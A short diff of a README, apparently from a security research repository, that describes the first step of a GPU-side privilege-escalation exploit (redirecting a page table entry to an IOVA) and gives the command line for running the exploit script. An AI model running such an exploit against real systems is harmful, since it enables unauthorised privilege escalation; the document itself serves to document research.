bane-stealthium/gpubreach/README.md

 ---

 #### Step 1: Perform GPUBreach
+This step will perform the GPU-side privilege escalation, find the candidate PTE of a VA we control to redirect the translation to point to a IOVA.

-First execute the GPUBreach program designed for CPU-side exploit:
+**First, we execute the GPUBreach program designed for this exploit.**

 ```bash
 $ cd gpubreach
 $ python3 gpubreach.py app_cpu_exploit --n_step1 24109 --n_step3 24070 -t 0.2 -s 15